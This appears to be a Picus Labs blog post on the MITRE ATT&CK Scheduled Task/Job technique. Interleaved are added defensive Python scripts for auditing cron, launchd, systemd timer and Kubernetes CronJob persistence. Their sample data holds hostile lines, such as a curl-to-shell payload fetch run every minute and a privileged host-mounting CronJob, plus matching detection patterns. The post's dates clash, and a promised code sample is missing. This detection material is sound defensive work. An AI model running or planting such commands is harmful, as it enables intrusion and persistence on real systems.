Huseyin Can YUCEEL & Picus Labs | April 18, 2022
The Top 10 MITRE ATT&CK Techniques Used by Adversaries
Picus Labs published The Red Report 2023 research and the 10 Most Prevalent MITRE ATT&CK techniques used by adversaries. The study analyzes over 200,000 malware samples and gives insights to help you defend.
We are continuing our blog series on the techniques listed in The Picus Red Report 2023 Top Ten List. In this blog, we explain the T1053 Scheduled Task/Job technique of the MITRE ATT&CK framework.
Establishing persistence in the victim’s network is an essential objective for adversaries. Otherwise, they would need to repeat their initial access tactics to access the target system each time and risk being detected. Adversaries use task scheduling utilities of operating systems to execute malicious payloads on a defined schedule or at system startup to achieve persistence.
Operating systems and platforms provide utilities to automate the execution of programs or scripts on a defined schedule. MITRE ATT&CK breaks T1053 down by scheduler into the sub-techniques covered below: At (Linux), At (Windows), Cron, Launchd, Scheduled Task, Systemd Timers, and Container Orchestration Job.
A scheduled task or job is a command, program, or script to be executed periodically (e.g., every Friday at 1:00 a.m.) or when a certain event occurs (e.g., a user logs on to the system). Legitimate users, like domain administrators, use scheduled tasks to create and run operational tasks automatically.
at is a command-line tool that allows users to schedule commands in various operating systems, such as Unix-like operating systems (e.g., BSD, macOS, and Linux distributions) and Microsoft Windows. Although this sub-technique covers the at command within Linux, it may be extended to other Unix-like operating systems.
Adversary Use of At (Linux)
The at utility in Linux allows users to schedule commands to be executed only once at a particular time. An adversary may use the at command to schedule one-time execution of malicious code at a point in time in the future.
In addition to a graphical user interface (GUI) for Task Scheduler, Microsoft Windows offers two native command-line utilities for task scheduling: schtasks.exe and at.exe.
There are two requirements to use the at command in Windows: the Task Scheduler (Schedule) service must be running, and the user must be a member of the local Administrators group.
Adversary Use of At (Windows)
Adversaries utilize at.exe to create recurring tasks that run periodically. For example, at.exe can be used to establish persistence and keep reverse shell sessions alive.
at.exe can also be used to run a command on remote systems. For example, the TG-0416 Threat Group uses at.exe for lateral movement. The BRONZE BUTLER APT group uses the at command to execute a malicious batch file on a remote system during lateral movement.
Cron is a utility to configure scheduled tasks in Unix-like operating systems. It can schedule tasks to periodically execute a command, script, or program. As mentioned above, at is also a task scheduling utility in Unix-like OSs. However, they have different use cases. While cron is suitable for repetitive tasks, at is suitable for one-time tasks.
Adversary Use of Cron
Adversaries use cron to establish persistence and execute their malicious payloads at regular intervals. For example, attackers use cron to run the downloaded malicious payload every minute in the Ngrok Mining Botnet campaign.
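Defenders can turn the pattern above (a cron entry that fetches and runs a payload every minute) into a check. The following Python is an added example, not code from the Picus post, that audits crontab text for every-minute schedules and for commands that pipe a download into a shell or run from a world-writable directory; the sample crontab, its paths and its address are constructed.

```python
import re

# Constructed sample crontab (not from a real incident). The last two
# entries mimic the "fetch and run every minute" pattern described above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/15 * * * * /usr/bin/certbot renew --quiet
* * * * * curl -fsSL http://198.51.100.7/x.sh | sh
* * * * * /tmp/.cache/miner -c /tmp/.cache/config.json
"""

# Command patterns a defender would treat as high-signal in a cron entry.
SUSPICIOUS_CMD = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"), "runs from world-writable dir"),
]

def min_interval_minutes(schedule):
    """Lower bound, in minutes, on how often a 5-field cron schedule fires."""
    minute, hour = schedule.split()[:2]
    if minute == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute)
    if step:
        return int(step.group(1))
    return 60 if hour == "*" else 1440

def audit_crontab(text):
    """Return (schedule, command, reasons) for entries worth an analyst's look."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # @reboot-style or malformed entry; not handled here
        schedule, command = " ".join(fields[:5]), fields[5]
        reasons = [why for pat, why in SUSPICIOUS_CMD if pat.search(command)]
        if min_interval_minutes(schedule) <= 1:
            reasons.append("fires every minute")
        if reasons:
            findings.append((schedule, command, reasons))
    return findings

if __name__ == "__main__":
    for sched, cmd, why in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(why)}] {sched} {cmd}")
```

On a live host the same function can be fed the output of crontab -l for each user and the files under /etc/cron.d.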
Launchd is the OS service management daemon that boots the system and loads and maintains services for macOS. It is similar to Service Control Manager on Microsoft Windows and systemd on Linux distributions.
Adversary Use of Launchd
Launchd is the first process launched after the kernel when a macOS system starts up. Adversaries use the launchd daemon to schedule their malicious executables to run at system startup. As an example, the Olyx macOS backdoor uses launchd to ensure the backdoor executable automatically launches when the user logs in.
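To make the login-persistence point concrete from the defender's side, here is an added Python example (not from the Picus post) that reads a LaunchAgent plist with the standard library and flags RunAtLoad/KeepAlive, short StartInterval values and programs living under user-writable or hidden paths; the plist contents, label, paths and the 600-second threshold are constructed assumptions.

```python
import plistlib

# Constructed LaunchAgent property list modelled on the "run when the user
# logs in" persistence described above; label and paths are made up.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Users/alice/Library/Caches/.hidden/updater</string>
    <string>--daemon</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
  <key>StartInterval</key><integer>300</integer>
</dict></plist>
"""

# Locations an unprivileged user can write to; a launch item whose program
# lives there deserves a closer look than one under /usr or /Applications.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/")

def audit_launch_item(data, max_interval=600):
    """Return review-worthy findings for one LaunchAgent/LaunchDaemon plist (bytes)."""
    item = plistlib.loads(data)
    label = item.get("Label", "<no label>")
    args = item.get("ProgramArguments") or []
    program = item.get("Program") or (args[0] if args else "")
    findings = []
    if program.startswith(WRITABLE_PREFIXES) or "/." in program:
        findings.append(f"{label}: program in user-writable or hidden path: {program}")
    if item.get("RunAtLoad"):
        findings.append(f"{label}: RunAtLoad set, runs at boot/login")
    if item.get("KeepAlive"):
        findings.append(f"{label}: KeepAlive set, relaunched if it exits")
    interval = item.get("StartInterval")
    if interval is not None and interval <= max_interval:
        findings.append(f"{label}: StartInterval={interval}s, re-runs frequently")
    return findings

if __name__ == "__main__":
    print("\n".join(audit_launch_item(SAMPLE_PLIST)) or "no findings")
```

In practice the function is run over every file in ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons.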
This sub-technique refers to Windows Task Scheduler. Windows Task Scheduler enables users to schedule tasks with time-based or event-based triggers.
Task Scheduler also supports the use of multiple triggers.
Adversary Use of Scheduled Task
Systemd provides timers that can be used as an alternative to cron. Timers provided by systemd include built-in support for calendar and monotonic time events, as well as the ability to run asynchronously. Therefore, adversaries can abuse systemd timers to perform task scheduling.
Like cron jobs, systemd timers enable adversaries to trigger a script or program at specified intervals (e.g., once a week, every 5 minutes during business hours from 8 a.m. to 6 p.m., on the first Monday of each month).
Systemd timers also allow for more precise control of events than cron jobs do. For example, they enable attackers to trigger a script or program a specified amount of time after an event, such as startup, completion of a previous task, or even the completion of the service unit called by the timer.
Adversary Use of Systemd Timers
Malware found in the Arch Linux AUR package repository uses systemd timers. When the user installs the xeactor package, the user’s machine downloads and executes the "x.sh" file. Then, x.sh downloads and executes another file named "u.sh", modifies systemd, and adds a timer that runs "u.sh" every 360 seconds with the code below:
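As an added, defender-side example (not the xeactor code and not Picus's tooling), this Python parses a constructed .timer/.service pair and flags the two traits described above: a short OnUnitActiveSec period such as 360 seconds, and an ExecStart pointing into a world-writable directory. Unit names, paths and the 600-second threshold are assumptions.

```python
import re

# Constructed unit files modelled on the behaviour described above: a timer that
# re-runs a script dropped in a writable directory every 360 seconds. Names made up.
SAMPLE_TIMER = """\
[Timer]
OnBootSec=120
OnUnitActiveSec=360
Unit=sysupdate.service
"""
SAMPLE_SERVICE = """\
[Service]
Type=oneshot
ExecStart=/bin/sh /tmp/.x/u.sh
"""

# Multipliers for the time-span suffixes systemd accepts (subset; others raise KeyError).
UNIT_SPAN = {"": 1, "s": 1, "sec": 1, "m": 60, "min": 60, "h": 3600, "hr": 3600, "d": 86400}

def parse_unit(text):
    """Minimal parser for systemd unit files: {section: {key: [values]}}."""
    out, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = out.setdefault(line[1:-1], {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            section.setdefault(key.strip(), []).append(value.strip())
    return out

def to_seconds(span):
    """Convert a systemd time span such as '360', '6min' or '1h 30min' to seconds."""
    return sum(int(n) * UNIT_SPAN[u] for n, u in re.findall(r"(\d+)\s*([a-z]*)", span))

def audit_timer(timer_text, service_text, max_period=600):
    """Reasons a timer/service pair deserves review; an empty list means none found."""
    timer, service = parse_unit(timer_text), parse_unit(service_text)
    reasons = []
    for key in ("OnUnitActiveSec", "OnUnitInactiveSec"):
        for val in timer.get("Timer", {}).get(key, []):
            if to_seconds(val) <= max_period:
                reasons.append(f"{key}={val}: re-runs at least every {max_period}s")
    for cmd in service.get("Service", {}).get("ExecStart", []):
        if re.search(r"(^|\s)/(tmp|var/tmp|dev/shm)/", cmd):
            reasons.append(f"ExecStart runs from a world-writable dir: {cmd}")
    return reasons
```

Calling audit_timer(SAMPLE_TIMER, SAMPLE_SERVICE) returns both findings; on a host, feed it each enabled timer from systemctl list-timers together with the service unit it names.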
Container Orchestration Job covers task scheduling functionalities provided by container orchestration tools. For example, Kubernetes provides the CronJob workload (application) for task scheduling similar to cron jobs on a Linux system. Adversaries may abuse this functionality to schedule the deployment of containers configured to execute malicious code.
A CronJob generates Jobs on a recurring basis, and a Job can be used to run containers that perform finite tasks for batch jobs. A CronJob object corresponds to a single line in a crontab (cron table) file in Linux. It executes a job on a specified schedule in cron format.
Adversary Use of Container Orchestration Job
A CronJob is used to automate routine tasks such as backups and report generation. Each of those tasks can be configured to repeat indefinitely (for example, once a day, week, or month), and you can specify the point within each interval at which the job should begin. Attackers may use CronJobs to schedule the execution of malicious code that would run as a container in the cluster.
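An added example (not Picus's or Kubernetes' own code): the following Python inspects a CronJob object in the JSON shape that kubectl get cronjob -o json returns and reports the settings a reviewer would question, namely an every-minute schedule, host namespaces, hostPath volumes, privileged containers, images outside an assumed registry allow-list, and commands that pipe a download to a shell. The sample object, namespace, image and registry name are constructed.

```python
import json
import re

# Constructed CronJob in the shape `kubectl get cronjob -o json` returns;
# namespace, name, image and the address in the command are made up.
SAMPLE_CRONJOB = json.loads("""{
  "apiVersion": "batch/v1", "kind": "CronJob",
  "metadata": {"name": "report-sync", "namespace": "default"},
  "spec": {"schedule": "* * * * *", "jobTemplate": {"spec": {"template": {"spec": {
    "hostPID": true,
    "volumes": [{"name": "root", "hostPath": {"path": "/"}}],
    "containers": [{"name": "sync", "image": "docker.io/someuser/sync:latest",
      "securityContext": {"privileged": true},
      "command": ["sh", "-c", "curl -fsSL http://198.51.100.7/x.sh | sh"],
      "volumeMounts": [{"name": "root", "mountPath": "/host"}]}]}}}}}
}""")

# Assumed organisational allow-list of image registries.
TRUSTED_REGISTRIES = ("registry.internal.example/",)
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")

def audit_cronjob(cj, trusted=TRUSTED_REGISTRIES):
    """Return findings for one CronJob object; an empty list means nothing notable."""
    meta = cj["metadata"]
    name = f"{meta.get('namespace', 'default')}/{meta['name']}"
    spec = cj["spec"]
    pod = spec["jobTemplate"]["spec"]["template"]["spec"]
    findings = []
    if spec.get("schedule", "").split()[:1] == ["*"]:
        findings.append(f"{name}: schedule '{spec['schedule']}' fires every minute")
    for key in ("hostPID", "hostNetwork", "hostIPC"):
        if pod.get(key):
            findings.append(f"{name}: {key} enabled")
    for vol in pod.get("volumes", []):
        if "hostPath" in vol:
            findings.append(f"{name}: hostPath volume exposes {vol['hostPath'].get('path')}")
    for c in pod.get("containers", []) + pod.get("initContainers", []):
        image = c.get("image", "")
        if not image.startswith(trusted):
            findings.append(f"{name}/{c['name']}: image {image} not from a trusted registry")
        if c.get("securityContext", {}).get("privileged"):
            findings.append(f"{name}/{c['name']}: privileged container")
        if PIPE_TO_SHELL.search(" ".join(c.get("command", []) + c.get("args", []))):
            findings.append(f"{name}/{c['name']}: command downloads and pipes to a shell")
    return findings

if __name__ == "__main__":
    print("\n".join(audit_cronjob(SAMPLE_CRONJOB)) or "no findings")
```

The same checks can be run cluster-wide by iterating over the items list of kubectl get cronjob -A -o json.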
Microsoft Corporation, “Backdoor:MacOS_X/Olyx.A.” https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:MacOS_X/Olyx.A
“Qakbot levels up with new obfuscation techniques.” http://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html
R. Falcone, “Shamoon 2: Return of the Disttrack Wiper,” 30-Nov-2016. https://unit42.paloaltonetworks.com/unit42-shamoon-2-return-disttrack-wiper/
“Use systemd timers instead of cronjobs.” https://opensource.com/article/20/7/systemd-timers
C. Cimpanu, “Malware Found in Arch Linux AUR Package Repository,” BleepingComputer, 10-Jul-2018. https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
Y. Weizman, “Threat matrix for Kubernetes,” 02-Apr-2020. https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/